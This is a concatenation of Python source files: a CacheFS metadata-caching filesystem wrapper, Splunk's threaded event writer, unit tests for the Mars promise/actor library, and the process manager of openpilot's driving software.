super(CacheFSMixin,self).remove(path)
with self.__cache_lock:
self.__cache.clear(path)
def removedir(self,path,**kwds):
super(CacheFSMixin,self).removedir(path,**kwds)
with self.__cache_lock:
self.__cache.clear(path)
def rename(self,src,dst):
super(CacheFSMixin,self).rename(src,dst)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
self.__cache.clear(src)
def copy(self,src,dst,**kwds):
super(CacheFSMixin,self).copy(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
def copydir(self,src,dst,**kwds):
super(CacheFSMixin,self).copydir(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
def move(self,src,dst,**kwds):
super(CacheFSMixin,self).move(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
self.__cache.clear(src)
def movedir(self,src,dst,**kwds):
super(CacheFSMixin,self).movedir(src,dst,**kwds)
with self.__cache_lock:
for (subpath,ci) in self.__cache.items(src):
self.__cache[pathjoin(dst,subpath)] = ci.clone()
self.__cache.clear(src)
def settimes(self,path,*args,**kwds):
super(CacheFSMixin,self).settimes(path,*args,**kwds)
with self.__cache_lock:
self.__cache.pop(path,None)
class CacheFS(CacheFSMixin,WrapFS):
"""Simple FS wrapper to cache meta-data of a remote filesystems.
This FS mixin implements a simplistic cache that can help speed up
access to a remote filesystem. File and directory meta-data is cached
but the actual file contents are not.
"""
pass
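# Hedged usage sketch (illustrative only): wraps an in-memory filesystem with
# CacheFS so repeated getinfo() calls within ``cache_timeout`` seconds are served
# from the meta-data cache. It assumes fs.memoryfs.MemoryFS is available in this
# distribution; any other FS object would behave the same way.
def _cachefs_usage_example():
    from fs.memoryfs import MemoryFS
    cached = CacheFS(MemoryFS(), cache_timeout=5, max_cache_size=100)
    cached.setcontents("/hello.txt", b"hello world")
    info = cached.getinfo("/hello.txt")   # fetched from the wrapped FS, then cached
    info = cached.getinfo("/hello.txt")   # served from the cache until the timeout
    cached.clear_cache("/hello.txt")      # drop cached entries for this path
    return info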
|
event_writer.py
|
# SPDX-FileCopyrightText: 2020 Splunk Inc.
#
# SPDX-License-Identifier: Apache-2.0
from future import standard_library
standard_library.install_aliases()
from six import string_types
from builtins import object
import queue
import multiprocessing
import threading
import sys
try:
    # Iterable lives in collections.abc on Python 3.3+; fall back for Python 2
    from collections.abc import Iterable
except ImportError:
    from collections import Iterable
from splunktalib.common import log
class EventWriter(object):
def __init__(self, process_safe=False):
if process_safe:
self._mgr = multiprocessing.Manager()
self._event_queue = self._mgr.Queue(1000)
else:
self._event_queue = queue.Queue(1000)
self._event_writer = threading.Thread(target=self._do_write_events)
self._event_writer.daemon = True
self._started = False
self._exception = False
def start(self):
if self._started:
return
self._started = True
self._event_writer.start()
log.logger.info("Event writer started.")
def tear_down(self):
if not self._started:
return
self._started = False
self._event_queue.put(None)
self._event_writer.join()
log.logger.info("Event writer stopped.")
def isopen(self):
return self._started and (not self._exception)
def write_events(self, events):
if not self.isopen():
return False
if events is None:
return True
self._event_queue.put(events)
return True
def _do_write_events(self):
event_queue = self._event_queue
write = sys.stdout.write
got_shutdown_signal = False
while 1:
try:
event = event_queue.get(timeout=3)
if event is not None:
if isinstance(event, string_types):
write(event.encode("utf-8"))
elif isinstance(event, Iterable):
for evt in event:
write(evt.encode("utf-8"))
else:
log.logger.info("Event writer got tear down signal")
got_shutdown_signal = True
except queue.Empty:
                # We need to drain the queue before shutdown;
                # a timeout means the queue is empty for now
if got_shutdown_signal:
log.logger.info("Event writer is going to exit...")
break
else:
continue
except Exception:
log.logger.exception(
"EventWriter encounter exception which may"
"cause data loss, queue leftsize={"
"}".format(event_queue.qsize())
)
self._exception = True
break
log.logger.info(
"Event writer stopped, queue leftsize={}".format(event_queue.qsize())
)
class EventWriterWithCheckpoint(EventWriter):
def _do_write_events(self):
event_queue = self._event_queue
write = sys.stdout.write
got_shutdown_signal = False
while 1:
try:
event = event_queue.get(timeout=3)
if event is not None:
# event is a tuple which consists of events and checkpoint
# information: (events, checkpoint_tuple)
# checkpoint_tuple includes the checkpoint manager obj, key
# and value of checkpoint: (ckpt_mgr_obj, key, state)
events = event[0]
ckpt_tuple = event[1]
if isinstance(events, string_types):
write(events.encode("utf-8"))
elif isinstance(events, Iterable):
for evt in events:
write(evt.encode("utf-8"))
# Update checkpoint after events are sent to stdout to avoid
# data loss.
if ckpt_tuple and ckpt_tuple[2]:
ckpt_tuple[0].update_state(ckpt_tuple[1], ckpt_tuple[2])
                        # Close the checkpoint obj to flush cached data to disk and
                        # avoid data duplication if the writer is torn down
if not self._started:
ckpt_tuple[0].close()
else:
log.logger.info("Event writer got tear down signal")
got_shutdown_signal = True
except queue.Empty:
                # We need to drain the queue before shutdown;
                # a timeout means the queue is empty for now
if got_shutdown_signal:
log.logger.info("Event writer is going to exit...")
break
else:
continue
except Exception:
log.logger.exception(
"EventWriter encounter exception which may"
"cause data loss, queue leftsize={"
"}".format(event_queue.qsize())
)
self._exception = True
break
log.logger.info(
"Event writer stopped, queue leftsize={}".format(event_queue.qsize())
)
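# Hedged usage sketch (illustrative only, not part of the Splunk library): shows
# the intended start / write_events / tear_down lifecycle. The checkpoint variant
# expects (events, (ckpt_mgr, key, state)) tuples as documented above; the
# ``ckpt_mgr`` argument is an assumption and must provide update_state() and close().
def _event_writer_usage_example(ckpt_mgr=None):
    writer = EventWriter(process_safe=False)
    writer.start()
    writer.write_events("<event>hello</event>")
    writer.tear_down()
    if ckpt_mgr is not None:
        ckpt_writer = EventWriterWithCheckpoint(process_safe=False)
        ckpt_writer.start()
        ckpt_writer.write_events(("<event>world</event>", (ckpt_mgr, "input_a", {"offset": 42})))
        ckpt_writer.tear_down()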
|
test_promise.py
|
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gc
import functools
import sys
import threading
import time
import unittest
import weakref
import sys
import gevent
from mars.actors import create_actor_pool
from mars.compat import Queue
from mars import promise
class ServeActor(promise.PromiseActor):
def __init__(self):
super(ServeActor, self).__init__()
self._result_list = []
def serve(self, value, delay=None, accept=True, callback=None):
gevent.sleep(delay or 0.1)
self._result_list.append(value)
if callback:
self.tell_promise(callback, value, _accept=accept)
def get_result(self):
return self._result_list
class PromiseTestActor(promise.PromiseActor):
def test_normal(self):
ref = self.promise_ref('ServeActor')
p = ref.serve(0, _promise=True)
for _ in range(10):
p = p.then(lambda v: ref.serve(v + 1, _promise=True))
def test_all_promise(self):
ref = self.promise_ref('ServeActor')
promises = []
def subsequent_all(*_):
def func(idx, *_, **kw):
return ref.serve(idx, _promise=True, **kw)
for idx in range(10):
promises.append(func(idx * 2).then(functools.partial(func, idx * 2 + 1)))
return promise.all_(promises)
ref.serve(-128, _promise=True) \
.then(subsequent_all) \
.then(lambda *_: ref.serve(127, _promise=True))
def test_timeout(self):
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _timeout=1, _promise=True) \
.catch(_rejecter)
def test_no_timeout(self):
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=1, _timeout=2, _promise=True) \
.catch(_rejecter)
def test_ref_reject(self):
from mars.errors import WorkerProcessStopped
try:
raise WorkerProcessStopped
except WorkerProcessStopped:
exc_info = sys.exc_info()
ref = self.promise_ref('ServeActor')
def _rejecter(*exc):
ref.serve(exc[0].__name__)
ref.serve(0, delay=2, _promise=True) \
.catch(_rejecter)
self.reject_promise_ref(ref, *exc_info)
def _raise_exception(exc):
raise exc
@unittest.skipIf(sys.platform == 'win32', 'does not run in windows')
class Test(unittest.TestCase):
def testPromise(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next(v, _accept=success)
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
def gen_promise(value, accept=True):
value_list.append(('gen_promise', value))
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False).then(lambda x: x + 1)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.then(lambda v: v + 1) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 3), ('thread_body', 4),
('catch', 4)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', 3)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: gen_promise(v + 1, False)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 4), ('thread_body', 5),
('catch', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v), lambda v: _raise_exception(ValueError)) \
.catch(lambda *_: value_list.append(('catch',))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('catch', )]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v, False)) \
.catch(lambda v: gen_promise(v)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('gen_promise', 2), ('thread_body', 3),
('gen_promise', 3), ('thread_body', 4),
('gen_promise', 4), ('thread_body', 5)]
)
value_list = []
gen_promise(0) \
.then(lambda v: gen_promise(v, False)) \
.then(lambda v: gen_promise(v)) \
.catch(lambda v: value_list.append(('catch', v))) \
.wait()
self.assertListEqual(
value_list,
[('gen_promise', 0), ('thread_body', 1),
('gen_promise', 1), ('thread_body', 2),
('catch', 2)]
)
finally:
gc.collect()
self.assertDictEqual(promise._promise_pool, {})
req_queue.put((None, None, None))
def testPromiseActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def test_proc():
test_ref.test_normal()
gevent.sleep(2)
self.assertListEqual(serve_ref.get_result(), list(range(11)))
gl = gevent.spawn(test_proc)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testAll(self):
promises = weakref.WeakValueDictionary()
req_queue = Queue()
value_list = []
time_unit = 0.1
def test_thread_body():
while True:
idx, v, success = req_queue.get()
if v is None:
break
value_list.append(('thread_body', v))
time.sleep(time_unit)
promises[idx].step_next(v, _accept=success)
def gen_promise(value, accept=True):
p = promise.Promise()
promises[p.id] = p
req_queue.put((p.id, value + 1, accept))
return p
try:
thread = threading.Thread(target=test_thread_body)
thread.daemon = True
thread.start()
value_list = []
promise.all_([]).then(lambda: value_list.append(('all', 0))).wait()
self.assertListEqual(value_list, [('all', 0)])
value_list = []
prior_promises = [gen_promise(idx) for idx in range(4)]
promise.all_(prior_promises).then(lambda: value_list.append(('all', 5))).wait()
del prior_promises
self.assertListEqual(
value_list,
[('thread_body', 1), ('thread_body', 2), ('thread_body', 3),
('thread_body', 4), ('all', 5)]
)
value_list = []
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
promise.all_(prior_promises).then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
del prior_promises
expected = [('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
def _gen_all_promise(*_):
prior_promises = [gen_promise(idx, bool((idx + 1) % 2)) for idx in range(4)]
return promise.all_(prior_promises)
value_list = []
gen_promise(0) \
.then(lambda *_: value_list.append(('pre_all', 0))) \
.then(_gen_all_promise) \
.then(lambda v: gen_promise(v)) \
.then(
lambda: value_list.append(('all', 5)),
lambda *_: value_list.append(('all_catch', 5)),
).wait()
expected = [('thread_body', 1), ('pre_all', 0), ('thread_body', 1), ('thread_body', 2), ('all_catch', 5)]
self.assertListEqual(value_list[:len(expected)], expected)
time.sleep(0.5)
finally:
self.assertDictEqual(promise._promise_pool, {})
req_queue.put((None, None, None))
def testAllActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_all_promise()
gc.collect()
gevent.sleep(3)
self.assertListEqual(
serve_ref.get_result(),
[-128] + list(range(0, 20, 2)) + list(range(1, 20, 2)) + [127]
)
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testTimeoutActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_timeout()
gc.collect()
gevent.sleep(3)
self.assertListEqual(serve_ref.get_result(), [0, 'PromiseTimeout'])
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testNoTimeoutActor(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_no_timeout()
gc.collect()
gevent.sleep(3)
# print(serve_ref.get_result())
self.assertListEqual(serve_ref.get_result(), [0])
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
def testRefReject(self):
try:
with create_actor_pool() as pool:
serve_ref = pool.create_actor(ServeActor, uid='ServeActor')
test_ref = pool.create_actor(PromiseTestActor)
def run_proc_test():
test_ref.test_ref_reject()
gc.collect()
gevent.sleep(3)
self.assertListEqual(serve_ref.get_result(), [0, 'WorkerProcessStopped'])
gl = gevent.spawn(run_proc_test)
gl.join()
finally:
self.assertDictEqual(promise._promise_pool, {})
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
    # whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
        # Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("Openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
from common.manager_helpers import print_cpu_usage
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
#"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
#"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"driverview": "selfdrive.controls.lib.driverview",
}
daemon_processes = {
#"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
'deleter',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
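# Hedged usage sketch (illustrative only): register_managed_process() accepts either
# a python module path (started via launcher) or a (directory, argv) tuple for a
# native binary, mirroring the entries in managed_processes above. The names used
# here ("mydaemond", "mynatived") are hypothetical and not part of openpilot.
def _register_example_processes():
  register_managed_process("mydaemond", "selfdrive.mydaemond", car_started=False)
  register_managed_process("mynatived", ("selfdrive/mynatived", ["./mynatived"]), car_started=True)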
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
if os.getenv("GET_CPU_USAGE"):
proc_sock = messaging.sub_sock('procLog', conflate=True)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
start_t = time.time()
first_proc = None
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
if os.getenv("GET_CPU_USAGE"):
dt = time.time() - start_t
# Get first sample
if dt > 30 and first_proc is None:
first_proc = messaging.recv_sock(proc_sock)
# Get last sample and exit
if dt > 90:
last_proc = messaging.recv_sock(proc_sock, wait=True)
cleanup_all_processes(None, None)
sys.exit(print_cpu_usage(first_proc, last_proc))
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
